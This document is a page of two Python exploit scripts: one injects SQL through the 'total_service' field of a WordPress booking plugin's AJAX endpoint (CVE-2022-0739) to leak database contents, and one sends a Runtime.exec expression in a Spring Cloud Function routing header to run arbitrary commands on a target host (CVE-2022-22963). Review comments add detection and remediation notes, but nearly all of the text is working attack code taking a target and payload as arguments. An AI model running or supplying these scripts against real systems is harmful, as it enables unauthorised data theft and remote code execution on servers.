CVE Exploits

CVE-2022-0739

# CVE-2022-0739
# ===================================
#
# Filename: booking-plugin-exploit.py
# Author: 4rtic f0x
# Description:
#
#       + The first command-line argument is the SQL fragment to inject;
#         the script prints the server's response, which contains the leaked data.
#         For more information, see the WPScan advisory for this CVE.
#
# ===================================

import os, sys,requests


# Placeholder values as published: the literal string "wp_nonce" and an
# example.com endpoint. Neither identifies a real site.
wp_nonce = "wp_nonce"
URL = "http://example.com/wp-admin/admin-ajax.php"


if __name__ == "__main__":
    # The only caller-controlled input is argv[1]. It is appended to a literal
    # that closes a parenthesis and sent as the `total_service` form field,
    # which is the input shape the SQL injection tracked as CVE-2022-0739
    # relies on.
    #
    # Defensive takeaways:
    #   * Server side, `total_service` should be handled as an integer (cast
    #     it, or bind it as a query parameter) rather than concatenated into
    #     SQL.
    #   * For monitoring, a POST to admin-ajax.php with this `action` and a
    #     `total_service` value that is not purely numeric is a usable
    #     detection signature.
    #
    # NOTE(review): argv[1] is read without a length check, so running the
    # script with no argument fails with IndexError.
    injected_fragment = sys.argv[1]
    form_fields = {
        'action': 'bookingpress_front_get_category_services',
        '_wpnonce': wp_nonce,
        'category_id': 33,
        'total_service': '-7502) %s' % injected_fragment,
    }

    # The raw response body is printed unmodified; nothing is parsed or stored.
    reply = requests.post(URL, data=form_fields)
    print(reply.text)

CVE-2022-22963

#!/bin/env python3

# CVE-2022-22963
# ===================================
#
# Filename: spring_cloud_functionCV.py
# Author: 4rtic f0x
# Description:
#
#       + As a first argument we pass the ip address of the target device and
#       as a second argument the command to execute via RCE
#
# ===================================

import sys, requests

def help():
    """Print the command-line usage string and terminate the process.

    The process ends with exit status 0, even though the only caller in this
    script invokes it when the argument count is wrong.
    """
    usage_line = "[!] Usage: %s <target-ip> <command>" % sys.argv[0]
    print(usage_line)
    exit(0)

if __name__ == "__main__":

    # Exactly two positional arguments are expected: the host and the command.
    if len(sys.argv) != 3:
        help()

    target_host, command = sys.argv[1], sys.argv[2]
    report_fields = (target_host, command)

    URI = "http://%s/functionRouter" % target_host

    # The command is wrapped in an expression that is sent in the
    # `spring.cloud.function.routing-expression` request header. CVE-2022-22963
    # concerns that header being evaluated as an expression on the server.
    #
    # Defensive takeaways:
    #   * An inbound request carrying this header, particularly one aimed at
    #     /functionRouter whose value contains a `T(...)` type reference, is a
    #     high-signal indicator to log and alert on.
    #   * Remediation is to upgrade Spring Cloud Function to a patched
    #     release. Dropping the header at a reverse proxy or WAF is a stopgap.
    RCE = 'T(java.lang.Runtime).getRuntime().exec("%s")' % command
    rawdata = 'rawdata'
    headers = {'spring.cloud.function.routing-expression': RCE}

    try:
        server_response = requests.post(URI, headers=headers, data=rawdata)
    except BaseException:
        # NOTE(review): this is equivalent to the bare `except:` in the
        # original, so it also swallows KeyboardInterrupt and SystemExit and
        # reports every failure as the same generic error.
        print("[!] EXCEPTION\n  [+] Host: %s\n  [+] Command: %s\n  [+] Status: ERROR" % report_fields)
        exit(1)

    # print(server_response.text)

    # NOTE(review): an HTTP 500 is the only signal used for the verdict. A 500
    # can have unrelated causes, and any other status does not prove that the
    # host is patched, so both messages below are heuristics rather than
    # confirmation. Anyone reading this output as a scan result should verify
    # the deployed library version instead.
    if server_response.status_code != 500:
        print("[!] The server is not vulnerable\n  [+] Host: %s\n  [+] Command: %s\n  [+] Status: FAILED" % report_fields)
    else:
        print("[!] RCE: The command has been executed\n  [+] Host: %s\n  [+] Command: %s\n  [+] Status: OK" % report_fields)

    exit(0)
Licensed under CC BY-NC-SA 4.0